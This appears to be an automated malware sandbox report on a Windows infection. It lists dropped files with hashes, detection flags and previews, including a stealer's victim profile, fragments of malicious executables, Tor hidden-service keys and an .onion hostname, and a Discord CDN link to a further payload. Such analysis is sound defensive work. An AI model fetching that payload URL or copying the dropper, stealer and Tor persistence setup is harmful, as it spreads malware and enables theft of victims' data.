Preview:	Version: 1.0..Date: Sat Nov 18 10:01:59 2023.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06.GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}.HWID: 7692bdc0d943c793a515ff7638c384f1..Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe.Work Dir: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w..IP: 156.146.49.168.Location: US, Seattle.Windows: Windows 10 Pro [x64].Computer Name: 813848.User Name: user.Display Resolution: 1280x1024.Display Language: en-CH.Keyboard Languages: English (United Kingdom) / English (United Kingdom).Local Time: 18/11/2023 10:1:59.TimeZone: UTC1..[Hardware].Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.CPU Count: 4.RAM: 8191 MB.VideoCard #0: Microsoft Basic Display Adapter..[Processes].System [4].Registry [92].smss.exe [324].csrss.exe [408].wininit.exe [484].csrss.exe [492].winlogon.exe [552].services.exe [620].lsass.exe [628].svchost.exe [752].fontdrvhost.exe [776].fontdrvhost.exe [784].svchost.exe [872].svchost.exe [920].dwm.exe [988].svchos

C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\passwords.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4902
Entropy (8bit):	2.5402512142169575
Encrypted:	false
SSDEEP:	48:tMMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMME:m
MD5:	974CC190D5703018C01CE08B904E227B
SHA1:	B4F0F2A72907FCF9551846411A7221F60A88F97D
SHA-256:	204A93E1274C57F489ADB21E0BF56064624582BB3B79FD59BA779EC8A137D8FF
SHA-512:	1949CD5EF9AE8ECB93C47E777DD183E758744D5768D024848E462B5416034D7D5CB2A9190D6AC7A2B8151380910ECDE4DF9396A8E9910B0582015A4923E7103E
Malicious:	false
Reputation:	unknown
Preview:	..................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAF1E.tmp

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	6710958
Entropy (8bit):	7.998536518881409
Encrypted:	true
SSDEEP:	98304:bOpzhgWh6LHZbUoR3eO+pZBq1OkrWo+oodFbQVWnrb3WQ4bW3U7yyf3xqq2/pB/u:Kpzp6/t09yNKFmurnz3fgRk57MV
MD5:	F4E79137AB4B7C0AF7F410F87561BF23
SHA1:	9412D1C5CE21F407EDE88144C45E098216271DB8
SHA-256:	044940B15C5DD4EB47C58BBD1F58F81B431CE82B6501F8744C9AE3EFB26C7AE7
SHA-512:	B1487FF19CC0261DD2C66CD57B0B16AC7DB9A0C2F4F50956B82AD84B5420A9A77AE2B126F6D39CE1731E0055D1F77EACD7C5EA2022E7F2620BB2E9CD4030EC4E
Malicious:	false
Reputation:	unknown
Preview:	PK........@..S,...............libssl-1_1.dll...t.U.8.w.t...z...f%h..D.h...IH"D....TTD.YE...,.z&.m...._.......<..."..`....(.W....vO.$..~....}.\|.C...n.u...{....S.......a.@.....W........z...W......2....3.}......;.3.y.m.3.wdN.#.d...?.9..z...:*..B.x2.l.-\u. ..R....g.=S..L. ..a.),...g.oB.4\|v.."...M.#.,...'.~....T..x........N...j.`...a...N........{u.!....;z...8q..........R. .kjb..B...&....=.rx./..$f,.&6^0.2f..Q..3...]..^p..w..^.......n....$\.E....I...^0...\A.D.Y.%_....V.3tC.p.....F.\.'.....\|3.y. ...vu...;o.h..X.%.ww.\|E...s......r%.+,.....'.....L.....St..>\|..2....p>..pw.w.>.....4.B...2\|~..............s;..\o...zw./..+z.............e.}h`.w.'......?uOF...3b..J...!.%..9..Y........%..n.....Y...c..D_.-..~k.G.Ye..B...W.i..I..'....b..V.....C_S....X..t5T.n....f...hP;D9.w.4.y`....W.'....G.....9....vhs.k...&k.K.N.(...6.-.(..%.B<.]..;.._=WC.@.^.d..(.0!.Jq..L....=n5..-2..r..!.ur....Cnk....Z..a.hZ,.3Q>KX......i..u....x..^..`.P.%."Ds..$....F.K.....V>>.yP...8

C:\Users\user\AppData\Local\Temp\toolspub2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\39D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	278016
Entropy (8bit):	6.694545547231002
Encrypted:	false
SSDEEP:	3072:+zK1Ijv9DbX1n27OOV0LaCl6UqjP2HnwJLv7F3bf7Zfk46RsVxz+da39iVR:8cav9FjjaCl6UseHOLzRf7BkQVx1M
MD5:	012CEA5B54F5CBDC516E264FFC132A22
SHA1:	6673A76737901F7C8AE01FB0D46DC81AD4A8CB57
SHA-256:	CE4D4D90930A76C70509F754B056AC01F31C18057174438033A0730139095F75
SHA-512:	939DE6C679EE1FA923BD4FBD2F25266D96DFDEB17360F70364754C850DD66D730F17353318AE7FF28B3FA550CC4CD79A269A5D8232D9315791F1FE86F660D122
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L..."..d.................f..........JQ............@..........................p......;........................................k..P...........................@..$....................................0..@............................................text...ne.......f.................. ..`.data...X............j..............@....rsrc..............................@..@.reloc..j"...@...$..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x64\SQLite.Interop.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1763632
Entropy (8bit):	6.553412105578455
Encrypted:	false
SSDEEP:	24576:YPUxmkgSxPgobZPRjZ22H6edtOZzWySRO3mlE0i/Yl5P+qF+8k+ao/si6:8UxXPgo8e6WYBSJZSS5P97I
MD5:	56A504A34D2CFBFC7EAA2B68E34AF8AD
SHA1:	426B48B0F3B691E3BB29F465AED9B936F29FC8CC
SHA-256:	9309FB2A3F326D0F2CC3F2AB837CFD02E4F8CB6B923B3B2BE265591FD38F4961
SHA-512:	170C3645083D869E2368EE16325D7EDAEBA2D8F1D3D4A6A1054CFDD8616E03073772EEAE30C8F79A93173825F83891E7B0E4FD89EF416808359F715A641747D7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..;...;...;...!./...#...."......D..<....D.......D..+.......3...%HC.8...;......D..:...D..:...D/.:...D..:...Rich;...........................PE..d...vr.a.........." ......................................................................`.........................................@........,..x.......................0A......(....x..p........................... y............... ...............................text............................... ..`.rdata....... ......................@..@.data....Y...@...D...(..............@....pdata...............l..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x86\SQLite.Interop.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1374512
Entropy (8bit):	6.792638917504314
Encrypted:	false
SSDEEP:	24576:eiDAYMz2epP8AEXn8z7qsyb8c+gntHKuvKtBLtTvD0nsrFSK96fYlYyv:1AYMza36enEuyjpTV96A2yv
MD5:	8BE215ABF1F36AA3D23555A671E7E3BE
SHA1:	547D59580B7843F90AACA238012A8A0C886330E6
SHA-256:	83F332EA9535814F18BE4EE768682ECC7720794AEDC30659EB165E46257A7CAE
SHA-512:	38CF4AEA676DACD2E719833CA504AC8751A5FE700214FF4AC2B77C0542928A6A1AA3780ED7418387AFFED67AB6BE97F1439633249AF22D62E075C1CDFDF5449B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.............jO......jO..^...jO............................,..................F...I.......I.......L.......I.......Rich............................PE..L..._r.a...........!.....n...F............................................................@.............................h.......x....`..................0A...p..h...p...p...............................@...............@............................text...fl.......n.................. ..`.rdata...............r..............@..@.data....5.......(..................@....gfids.......P......."..............@..@.rsrc........`.......$..............@..@.reloc..h....p......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yXVRjmzZGPJCMmF.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\C4AD.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	97584
Entropy (8bit):	6.588784607304585
Encrypted:	false
SSDEEP:	1536:DeoaElzEZ2fG/nmkK4s+4RV+NYUHkQOatEEPRIcjmmih+vhtbJg:vTlzg2Knmj24RV+Nwr262fiWt6
MD5:	0026E29A1D4C4D90FDE2C7F270B58CEE
SHA1:	A69B70986ED4F5DCF2DE77E1FA33AF44B7BE70A1
SHA-256:	470B974BE1CC9C8EF8482FBFBB123224AC0F2FB17D7A6C1AAF4EF7398A932BCD
SHA-512:	24EC5B4537ED49BB1FD49E9FB4285DF682D641D0994314EC4F293E6E7F5C7B1F1BD5B1D4E87ED41E96C598FDA1F00CB420D5C20E7A47B6F067025CEE7B9813F0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.]..............0..n..........b.... ........@.. ..............................h.....`.....................................O....................x...A.......................................................... ............... ..H............text...hm... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................D.......H........D...8..........h}..p...........................................0...........(......}......}......}..... L...}......}......}......}.....s....}.....s....}.......s....}.......s....}.....s....}....r...p(......,...}.....r...p}.....0..........s......r...po.....r...po......(....o....s.....r...p..(...........( ...(!...o"...r!..po#...o$...t.......o.......#..rA..p..o%...(....(....(&.....................Tp.# .....(.....0............}......}......}......}......}......}.....s

C:\Users\user\AppData\Local\UpdateLinks

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.897509243306508
Encrypted:	false
SSDEEP:	3:N8cCWdy6//NTABTW+QKRpXzo+LACZ1edWzR2n:2cry6XNklW+lDs08MQ
MD5:	A3FC9B5D30D2F37E41B4BB6DF8CDC56E
SHA1:	F7A8A433862770117634360D2EE57FDA19E06CCE
SHA-256:	AE380A1377D05F13B264D657A5740A31E4B08A32634B2D4867E8C344062EBAED
SHA-512:	29D2E49C40BEE9613EE8E59775EC800B575ED5ECA5811FD1659FE0D577C7F810A634106833B4C45F0E682B872EB78019237C0EE5EC10EDB67B45C19EF223A4B8
Malicious:	false
Reputation:	unknown
Preview:	https://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883.NOTASKS

C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8F82.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	5.356715396410593
Encrypted:	false
SSDEEP:	3072:sHhVMpN63m30tj7p9bqUrH1sCe5wQUGXnUAjNY7:sHAbrep9bqAIXnUw
MD5:	52CC4016261C2CC9311F48B4D84C8D4E
SHA1:	E9B87D50469953CF6A819542F3B8298DF3606BED
SHA-256:	3F196CBD8FD145E02535D112D35E7F4952286DD5BF033FC88534AF567EB78843
SHA-512:	05F715BDF642F89C115A80EABE3CDE7B0F2BC40E46B9487F833D12193E87104852092075F8D4277CE2044EAEAE282F2C785384F31620E60C31DC83BD9F433681
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.x..........."...0.................. ........@.. ....................... ............`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`...8.......7...8...%...........................................PK..........................................5...P...n...w...{...................................................................\|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(t....".(u.....s,.........(&....~(....ow....!...~!...(5....".

C:\Users\user\AppData\Local\ixas4a6gsv\port.dat

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:KR:KR
MD5:	B75BD27B5A48A1B48987A18D831F6336
SHA1:	D3EC16D1868EDC7DA81BE9FC203F819281C0E4BA
SHA-256:	72DBC1D0C9905717D66AD6D89E2A6A32718F17ABC8DCFEA7B1664B61A0600197
SHA-512:	2F97BD398925FE9831F6227960C9598A2F3053656A3E264CA99758403EFD4B93E7D637BC91134F0DB74F311FEE88C4092B77E0A13B463B896BFCDFC131BBA4C7
Malicious:	false
Reputation:	unknown
Preview:	2634

C:\Users\user\AppData\Local\ixas4a6gsv\report.lock

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\ixas4a6gsv\tor\data\cached-certs.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.051534614948206
Encrypted:	false
SSDEEP:	384:7d24ZFtVf1hc1xyd4AW9V9hC1hIh2h4YVc1h1tMY4QkV6icO1hMtqaU4XVy41h9F:Z2M1uxyrqvUg6xyhRBkoicOaq32xi8n3
MD5:	1CC9459238131505B84996144B62D6C5
SHA1:	5ABDDF5C3D709D3DA5133DFED80F7B4E6DE968C0
SHA-256:	DDB2EE0F6B059A92E0C5E8FAE8F78902AC1DD4469321B8B6F2B1A102C7447266
SHA-512:	51E86640E1271FF8D010D9710A12E884C39F4FF8478D6CBE470DA3C50B3273C0F0373EC4436F9FF449986B9410442907530ABB072FCBE1F2972DBE255712AB8D
Malicious:	false
Reputation:	unknown
Preview:	dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2023-03-05 22:55:19..dir-key-expires 2024-03-05 22:55:19..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvaQxritqKpbDk3YHM5nZdb7HiyF9oJ8jgxja4uwda5+q7JD4ZDSp..fZPR5jet7Ceijf69XjniJQB7HOQOwWe4QDujylFMRYT/JlBlWGQd+48UXdgyjJ/a..6p0pOp7mus6956GRwijqL8uvFQYK

C:\Users\user\AppData\Local\ixas4a6gsv\tor\data\cached-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2677347
Entropy (8bit):	5.617783408029817
Encrypted:	false
SSDEEP:	12288:33LLwgbp7QJ7MgBS+kIp4MXvk5DUFaN2txriZ80/xpR9y/VdY/nnL2i:nPqJ7zdXamq+ruzgYT/
MD5:	A8FC1F90E343BFBE33A2D68C9D44B481
SHA1:	30571D26F743544D9894FE7B80E87853966C9398
SHA-256:	4A25AD78EA946B86E12DAE4ECCC726BFFF038FA234917330CF1F203CE891A9E6
SHA-512:	054B88A7BDF2572D555BF958F895FB119C724A8F200032A0409515D4AF0A46B64642DB2A6D2F35E5147C22ED648200BA03D289A2D0A6CE92177380B6734130EE
Malicious:	false
Reputation:	unknown
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-18 08:00:00.fresh-until 2023-11-18 09:00:00.valid-until 2023-11-18 11:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

C:\Users\user\AppData\Local\ixas4a6gsv\tor\data\state.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	3426
Entropy (8bit):	5.318725585159506
Encrypted:	false
SSDEEP:	48:c2hKeZmyw2iuXKjm2avULsEQt0q+5YUYmmXFN:thKeEyxDXKj+MATt0qzKmX7
MD5:	9B05719892D8C2DD0371BF1E882CFF17
SHA1:	B04A0990521A7F20D5BB928AEDEDF6ABB245B98C
SHA-256:	72B2CCD14A3A72D01B68BF4C4D23D1CE055886109DB84E3CBA8884A9BCEC15CD
SHA-512:	BDF9800B3A0470333D40FBC8EF1C4BBBB22AB2800B8155A0BB25AB208071284095D84A58A8B4526516A497EA3CBA2451019D8E9D6397B719C6242E39BAA55DD0
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2023-11-18 10:03:25 local time..# Other times below are in UTC..# You do not need to edit this file.....Dormant 0..Guard in=default rsa_id=2E5FCBC791A615978CCDF32A77AD60DAD1DF1791 nickname=organGrinder sampled_on=2023-11-06T21:29:57 sampled_idx=0 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=11DF0017A43AF1F08825CD5D973297F81AB00FF3 nickname=gGDHjdcC6zAlM8k08lX sampled_on=2023-11-11T03:31:33 sampled_idx=1 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=BB80D7CDBE2A47DF1C54185204B0ACB9F17E2E28 nickname=prsv sampled_on=2023-11-07T17:03:57 sampled_idx=2 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=28F31371C244E8B3014EBEFD64073581C1F492E9 nickname=RDPdotSH sampled_on=2023-11-07T15:19:38 sampled_idx=3 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=B587EEC187B6199312F7C76E7ED342C8CA1BA9C6 nickname=DakotaEdge sampled_on=2023-11-14T23:01:17 sampled_idx=4 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=5C3693C0E7B537553BAB3

C:\Users\user\AppData\Local\ixas4a6gsv\tor\data\unverified-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2677347
Entropy (8bit):	5.617783408029817
Encrypted:	false
SSDEEP:	12288:33LLwgbp7QJ7MgBS+kIp4MXvk5DUFaN2txriZ80/xpR9y/VdY/nnL2i:nPqJ7zdXamq+ruzgYT/
MD5:	A8FC1F90E343BFBE33A2D68C9D44B481
SHA1:	30571D26F743544D9894FE7B80E87853966C9398
SHA-256:	4A25AD78EA946B86E12DAE4ECCC726BFFF038FA234917330CF1F203CE891A9E6
SHA-512:	054B88A7BDF2572D555BF958F895FB119C724A8F200032A0409515D4AF0A46B64642DB2A6D2F35E5147C22ED648200BA03D289A2D0A6CE92177380B6734130EE
Malicious:	false
Reputation:	unknown
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-11-18 08:00:00.fresh-until 2023-11-18 09:00:00.valid-until 2023-11-18 11:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols

C:\Users\user\AppData\Local\ixas4a6gsv\tor\geoip

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3722717
Entropy (8bit):	4.010901367141998
Encrypted:	false
SSDEEP:	49152:Pa4vmG4rp0QBJycSB2mTZJlZYofSWeT9P9utTTCbvaSa+:0
MD5:	7AD60C3E9CDB9992B1C2F5D79701B812
SHA1:	B3A9770171D3060502B7F13C0618BE109B92DF6C
SHA-256:	0AA9299BFF0A8AE1B1FEC6B6C96C551CC2FC31E213BD11EA9F414D571CC8C9D3
SHA-512:	0939E3F5333395B995F35F0B635FEA0089BAEF9817ECE6FB54BFEB3DC51DC48A6369605C5EAEC53EC2C37247789C707FC02579EA3DE2A53F5813222542DC9460
Malicious:	false
Reputation:	unknown
Preview:	# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039

C:\Users\user\AppData\Local\ixas4a6gsv\tor\geoip6

Download File

Process:	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5379114
Entropy (8bit):	3.102923211242497
Encrypted:	false
SSDEEP:	24576:iNjMD2TFE4TisycmlLikLPTOyjWGYoOxMUV5TnL/rg1ThnL/P7dDb3z7LAq7v80P:x
MD5:	69AAC4453831397E074682E38B1C6F99
SHA1:	410B70763FC675B3622264FAA0FC67B78FDE30C2
SHA-256:	F90A98373DBCBA676A38C2E98DE16DADB2D44FC3D5389C74E43A84C2F16DB81B
SHA-512:	91C274C1DCEBAAD1CA0530CD560A51D39B3842126F6F317806AF562DCBC701BAF49E2B3AA2504C187DE3A41ED13005E92A6E511DBC0708974379CE79258F8CD1
Malicious:	false
Reputation:	unknown
Preview:	# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21

C:\Users\user\AppData\Local\ixas4a6gsv\tor\host\hostname.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.7539280318460255
Encrypted:	false
SSDEEP:	3:WTLUOO0fIJExe/MeAeWXdcLX+K8vn:WHUOXf7Stwejqv
MD5:	07327F68FFD184195B730D51CEE8A2A9
SHA1:	6D219DDFF6F4C37E75F91A7EB9DE6F4DAC5E7528
SHA-256:	25B3CFE1AAF3A0C1B802C9FB42F6AE8E80E265A445F0E6DE02463CF0233B7A7D
SHA-512:	797CFD57D49C048E8D01D87CE048DA794BCB3B14EE3D07FE72D06D36AB7A215746D483BF18E77854D08F9CE5D0F645E5D38B56E1D53B5101CDBBCF05ABDF027C
Malicious:	false
Reputation:	unknown
Preview:	s4vnqkghgw7zmfs7drw2u6qvac4powvgykixyevbi6ue472oc5vnnryd.onion..

C:\Users\user\AppData\Local\ixas4a6gsv\tor\host\hs_ed25519_public_key.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	5.476409765557392
Encrypted:	false
SSDEEP:	3:16GGRAAYlcvzazzLfn7XuEyPn:XuAAYlMz+j7s
MD5:	AD616142C50731FE9E5679BA04E85B4F
SHA1:	EAE8C5798647115C919030F250F1C29052779E69
SHA-256:	3A354C779248B959F62B0184D21781C5ED5D00ED89CF18A0E5E53C8EA2261A32
SHA-512:	7D75D1C5F3DD46F4CE6B437559AEEC205A4BD1381E872F014CD6643B7702440A322CB7B9F246DFB94F50A82C6AD6BBA9F0AE6A534EA042AC6FF9FA3E3FC1E366
Malicious:	false
Reputation:	unknown
Preview:	== ed25519v1-public: type0 ==....*.(.5..._.m.z....Z..\|..G.N.N.j

C:\Users\user\AppData\Local\ixas4a6gsv\tor\host\hs_ed25519_secret_key.tmp

Download File

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	5.95209908924029
Encrypted:	false
SSDEEP:	3:16GGx6qAYlkyoo/pjIqol9JJDIwY4zGkgKs0Z:XwAYl7oipcqovItygKVZ
MD5:	9CE4EFF1E9501F5A9EAFD2497081EDD3
SHA1:	71E1F8E5E98929B63736F2B791669E0000AD0BF8
SHA-256:	D2EF5F0623D288014AC24F8F891EF06AABD9F7A4A0471D866A6488455EFE5742
SHA-512:	C36853CAFDF5239AC556FE915990B5E42FF0017848325F001591BE85810A97D19C2CBDD83873AE9B8CC4BFB6088FCF4376375E1E035FD4F9AD6A14E398FC9B87
Malicious:	false
Reputation:	unknown
Preview:	== ed25519v1-secret: type0 ==...@*.)Y...>..F.Ua.D.F.I...a.\|.f. pQ.)?.]S...a.]...AR.c.a{.I.<

C:\Users\user\AppData\Local\ixas4a6gsv\tor\libcrypto-1_1.dll

Download File

